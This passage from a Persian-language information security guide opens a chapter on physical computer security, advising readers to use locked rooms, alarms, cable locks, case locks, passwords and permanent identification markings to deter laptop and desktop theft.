ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣـﺸﻜﻼﺕ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ ﻣﺜـﻞ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ١١ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺻﺪﻕ ﻛﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﭼﻮﻥ ﺍﻣﻜﺎﻥ ﺷﻜﺴﺖ ﺑﺮﺍﻱ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﺑﺮ ﻳﻚ ﺷﻴﻮﻩ ﺗﻜﻴﻪ ﻧﻤﻮﺩ. ٥٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻓﺼﻞ ﺳﻮﻡ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﺭﺍﻫﻬﺎﻳﻲ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ ﻛـﺮﺩ ﻭ ﺍﺯ ﺳـﺮﻗﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤـﻮﺩ .ﻣﺒﺎﺣـﺚ ﻋﻤـﺪﺓ ﺍﻳﻦ ﻓﺼﻞ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ :ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ،ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ،ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ. ﻣﻘﺪﻣﻪ ﻗﺎﻧﻮﻥ ﺍﻭﻝ: ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﺳﺮﻗﺖ ،ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻓﻜﺮ ﻛﻨﻴﺪ. ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭ ﺁﺯﺍﺭ ﺩﻫﻨﺪﻩ ﺍﺳﺖ ﻭ ﭼﻨﺎﻧﭽـﻪ ﺑﻴﻤـﻪ ﻧﺒﺎﺷﻴﺪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺭﺍ ﺑﺮ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﺧﻮﺍﻫﺪ ﻛﺮﺩ .ﺩﺭ ﺑﻌـﻀﻲ ﻣﻮﺍﻗﻊ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻋﺚ ﺍﻓﺸﺎﻱ ﺍﻣﻮﺭ ﺷـﻐﻠﻲ ﻭ ﻳـﺎ ﺍﺳـﺮﺍﺭ ﻣﺤﺮﻣﺎﻧﺔ ﺍﺷﺨﺎﺹ ﻣﻲﮔﺮﺩﺩ ﻭ ﺩﺭ ﺷﺮﺍﻳﻂ ﺑـﺪﺗﺮ ،ﺳـﺮﻗﺖ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻐﻞ ﻣﻲﺷﻮﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﭼﻨﺎﻧﭽـﻪ ﺩﺭ ﺍﻳـﻦ ﺧﺼﻮﺹ ﭼﻨـﺪ ﺭﻭﺵ ﺳـﺎﺩﻩ ﻭ ﺍﺭﺯﺍﻥﻗﻴﻤـﺖ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﺩ ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻭ ﻛﻴﻔﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛـﺮﺩ ﻳﺎ ﺣﺪﺍﻗﻞ ﺍﺣﺘﻤﺎﻝ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻛﺎﻫﺶ ﺩﺍﺩ. ﻳﻜﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩﻫـﺎﻱ ﺩﺭﻙ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺿﺎﺑﻄﻪﻣﻨﺪ ١٣ﺍﺳﺖ .ﺑﺎ ﺷـﺮﻭﻉ ﺍﺯ ﻣﻌﺮﻓـﻲ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ،ﺩﺭ ﺳﺎﻳﺮ ﻓـﺼﻮﻝ ﺑﺨـﺶ ﺩﻭﻡ ﺑـﻪ ﺑﺮﺭﺳﻲ ﺟﻮﺍﻧﺐ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﻭ ﺍﺳﺎﺱ ﺍﺳـﺘﻘﺮﺍﺭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑـﺮﺍﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷﺨـﺼﻲ ﻭ ﮔـﺮﻭﻩﻫـﺎﻱ ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺗﻮﺿﻴﺢ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ .ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺟﻨﺒﻪ ﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮔﺘـﺮ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺣﺮﻓـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﭘــﻨﺠﻢ ﺍﺭﺍﺋــﻪ ﺷــﺪﻩ ﺍﺳــﺖ .ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺑــﺎ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺎ ﻛﻠﻴﺎﺕ ﻣﻮﺿﻮﻉ ﺁﺷﻨﺎ ﺷـﺪﻳﺪ، ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﺮ ﺩﺍﻧﺶ ﻓﻨﻲ ﺧﻮﺩ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ. 
ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭ ﻛﺮﺩﻥ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ: ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺍﺳﺖ .ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺴﺘﻪ ﺑـﻪ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻛﺠـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻳـﺪ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﭼﻪ ﺣﺴﺎﺳﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﻳﺎ ﻳﻚ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻣﺤﺴﻮﺏ ﺷﻮﺩ. Rule-Based Approach 13 ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺩﺯﺩﻱ ﺭﺍﻳﺎﻧـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ :ﻛـﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ؛ ﻭ ﻳﺎ ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ. • ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻣﺤﻞ ﻧﮕﻬـﺪﺍﺭﻱ ﺭﺍﻳﺎﻧـﻪ ﺍﻣـﻦ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺩﺭ ﻳـﻚ ﺍﺗـﺎﻕ ﻗﻔﻠﺪﺍﺭ ﻧﮕﻬﺪﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﻳﺎ ﺍﮔﺮ ﺩﺭ ﻣﺤﻞ ﻛـﺎﺭ ﺧـﻮﺩ ﺑـﺎ ﻫﻤﻜﺎﺭﺍﻥ ﺩﻳﮕﺮﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﻣﻌﺮﺽ ﺩﻳـﺪ ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﺤﺎﻓﻞ ﻋﻤﻮﻣﻲ ﻣﺎﻧﻨـﺪ ﻓﺮﻭﺩﮔﺎﻩﻫﺎ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ. • ﺍﮔﺮ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺯﻣـﺎﻥ ﻋـﺪﻡ ﺣـﻀﻮﺭ ﺷـﻤﺎ ﺩﺭ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷﺨـﺼﻲ ﺷـﺒﺎﻧﻪ ﻭﺍﺭﺩ ﺍﺗـﺎﻕ ﺑﺨﺶ ﺩﻭﻡ ﻛﻠﻴﺎﺕ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺸﻜﻠﻲ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺖ .ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻭ ﺧـﺼﻮﺻﹰﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺑﻪ ﺳﺎﺩﮔﻲ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ .ﭼﻨﺎﻧﭽﻪ ﺳﺎﺭﻕ ﻣﺎﻳﻞ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻧﺒﺎﺷﺪ ﻣﺮﺍﻛﺰ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﺯﺩﻱ ﻭ ﺩﺳﺖﺩﻭﻡ ﺭﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺳـﺎﺭﻗﺎﻥ ،ﺭﺍﻳﺎﻧـﻪ ﻭ ﻧﻤﺎﻳﺸﮕﺮ ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﻪ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺮﻧﺪ ﺑﻠﻜـﻪ ﻗـﺴﻤﺘﻬﺎﻱ ﻣﻬﻢ ﺁﻥ ﻣﺎﻧﻨﺪ ﺣﺎﻓﻈﻪ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺭﺍ ﻣﻲﺩﺯﺩﻧﺪ .ﺑﺎﻳﺪ ﮔﻔـﺖ ﻛـﻪ ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ ﺑﺎﺯﺍﺭ ﺧﻮﺑﻲ ﺩﺍﺭﻧـﺪ ﻭ ﺣﻤـﻞ ﻭ ﻧﻘﻠـﺸﺎﻥ ﻧﻴـﺰ ﺁﺳـﺎﻥ ﺍﺳﺖ ،ﺍﻣﺎ ﭘﻴﺪﺍ ﻛﺮﺩﻧﺸﺎﻥ ﺍﮔﺮ ﭼﻪ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻴﺴﺖ ﻭﻟـﻲ ﺑـﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ. ٥٦ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺷﺪﻩ ﻭ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒـﺮﺩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺁﮊﻳـﺮ ﺧﻄـﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ. • ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺍﻳﻤﻨﻲ ،ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺑﻞ ﺳﻴﻤﻲ ﻭ ﻳﺎ ﺯﻧﺠﻴﺮ ﺑﻪ ﻣﻴﻠﻪ ،ﻟﻮﻟﻪ ﻳﺎ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ ﻧﺪﺍﺭﻧﺪ ﻣﺘـﺼﻞ ﻛﻨﻴـﺪ .ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺩﺭ ﻣﺤﺎﻓـﻞ ﻧـﺴﺒﺘﹰﺎ ﻋﻤﻮﻣﻲ ﻣﺜﻞ ﻣﺪﺍﺭﺱ ﻭ ﻳﺎ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ. ﺍﻛﺜﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺍﺭﺍﻱ ﻣﺤﻠﻲ ﻣﺨﺼﻮﺹ ﺍﺗﺼﺎﻝ ﻣﻲﺑﺎﺷـﻨﺪ. ﻻ ﺩﺍﺭﺍﻱ ﻛﺎﺑﻠﻬﺎ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻌﻤﻮ ﹰ ﻗﻔﻠﻬﺎﻱ ﺑﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ. 
• ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﺍﻱ ﻗﻔﻠﻲ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﺍﺯ ﺑـﺎﺯ ﺷـﺪﻥ ﺑﺪﻧﻪ ١٤ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲ ﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﭘﻴﭽﻬﺎﻱ ﻣﺨـﺼﻮﺹ ﻛـﻪ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ ﺑـﺎﺯ ﻛـﺮﺩﻥ ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ. • ﭼﻨﺎﻧﭽﻪ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﺯﺷـﻤﻨﺪﻱ )ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻛـﺎﺭﻱ ﻳـﺎ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ( ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ،ﻻﺯﻡ ﺍﺳـﺖ ﺯﻣﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒـﺖ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻭ ﻳـﺎ ﺍﺯ ﺁﻥ ﺩﻭﺭ ﻫﺴﺘﻴﺪ )ﻣﺜ ﹰﻼ ﺍﮔﺮ ﺍﺯ ﻫﺘﻞ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻳﺪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺗﺎﻕ ﺍﺳـﺖ( ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ١٥ﺑﻪ ﺁﻧﺮﺍ ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻛـﺎﻫﺶ ﺩﻫﻴﺪ .ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺑـﻪ ﻣﻌﻨـﺎﻱ ﺍﺳـﺘﻔﺎﺩﺓ ﻭﺍﻗﻌـﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜـﻲ ﺑـﻪ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﻭ ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤـﺎﻳﺶ ﻣﺠﻬـﺰ ﺑـﻪ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﺍﻳـﻦ ﻧـﻮﻉ ﺍﺯ ﺣﻔﺎﻇـﺖ ﻫﺴﺘﻨﺪ )ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺑﺤﺚ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺠﻮﺯ ﻭﺭﻭﺩ ﺩﺭ ﻫﻤﻴﻦ ﻓﺼﻞ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(. • ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ PDAﻫﺎ ١٦ﻛﻮﭼﻚ ﻣﻲﺑﺎﺷـﻨﺪ ﻭ ﺑـﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺯﺩﻳﺪﻥ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺍﺳـﺖ .ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻧﻤﻲﻛﻨﻴـﺪ ﺣﺘﻤـﹰﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤـﻴﻂ ﻛـﺎﺭ ﺧﺎﺭﺝ ﻧﻤﺎﻳﻴﺪ. ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻞ ﺑﻪ ﺧﺮﻳﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﺳـﺖ ﺩﻭﻡ ﺑﺎﺷـﻨﺪ ﺑـﺴﻴﺎﺭ ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ ،ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﻣـﺸﺨﺺ ﺑﺎﺷـﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺯﺩﻱ ﺍﺳﺖ .ﺑﻬﺘﺮﻳﻦ ﻭ ﺍﺭﺯﺍﻧﺘﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﺎﺭﻗﺎﻥ ﺗﻤﺎﻳﻠﻲ ﺑﻪ ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﺨـﺼﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺑﺎ ﻋﻼﺋﻢ ﺛﺎﺑﺖ ﻭ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩ ﺑﺮ ﺑﺪﻧﺔ ﺭﺍﻳﺎﻧﻪ ﺣﻚ ﻭ ﻳﺎ ﻧﻘﺎﺷﻲ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﺎﻣﻞ ﺍﺳﻢ ﻳﺎ ﻣﺸﺨﺼﺎﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺍﺯ ﺍﻳـﻦ ﻧﻮﻉ ﻋﻼﻣﺘﻬﺎ ﺩﺭ ﻗـﺴﻤﺖ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻳـﺎ ﺷـﻜﺎﻓﻬﺎﻱ ﺩﻳﮕـﺮ ﺍﺳــﺘﻔﺎﺩﻩ ﻧﻨﻤﺎﻳﻴــﺪ .ﻫﻤﭽﻨــﻴﻦ ﺁﮔــﺎﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﺭﻭﻱ ﺑﺪﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺑﻄﺎﻝ ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﮔﺮﺩﺩ. ﺭﺍﻳﺎﻧﻪﻫﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻧﺪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺴﺒﺖ ﺑـﻪ ﮔـﺮﺩ ﻭ ﺧـﺎﻙ ﻭ ﺳـﻄﻮﺡ ﻧـﺎﻫﻤﻮﺍﺭ ﺣـﺴﺎﺱ ﻫﺴﺘﻨﺪ .ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﻛـﻪ ﮔﺮﺩ ﻭ ﺧﺎﻙ ﺩﺭ ﺁﻧﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺮﺗﺒﹰﺎ ﺑﺎﻳﺪ ﺑـﺎ ﺩﻗـﺖ ﺯﻳـﺎﺩ ﺁﻧـﺮﺍ ﺗﻤﻴﺰ ﻛﺮﺩ ﺗﺎ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻣـﺴﺪﻭﺩ ﻧـﺸﻮﺩ .ﺑﺮﺧـﻲ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻫﻤﭽﻨﻴﻦ ﻧﺴﺒﺖ ﺑﻪ ﻓﺮﻭﺭﻓﺘﮕﻴﻬـﺎ ﻭ ﺑﺮﺁﻣـﺪﮔﻴﻬﺎﻱ ﺳـﻄﺤﻲ ﻛـﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﻴﺰ ﺣﺴﺎﺱ ﻣﻲﺑﺎﺷﻨﺪ. 
ﺟﻨﺒﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﻧﺼﺐ ﻳﻚ ﻗﻄﻌﻪ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺪﻧـﺔ ﺭﺍﻳﺎﻧـﻪ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﺧﻄﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﺑـﺎﺭﺓ ﺷـﻮﻛﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺩﺍﺩﻩ ﺷﺪﻩ ﺗﻮﺟﻪ ﻛﻨﻴﺪ )ﺷﻮﻙ ﺍﻟﻜﺘﺮﻭﺍﺳﺘﺎﺗﻴﻚ ﺑﺎﻋـﺚ ﺻﺪﻣﻪﺩﻳﺪﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻲﺷﻮﺩ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ( 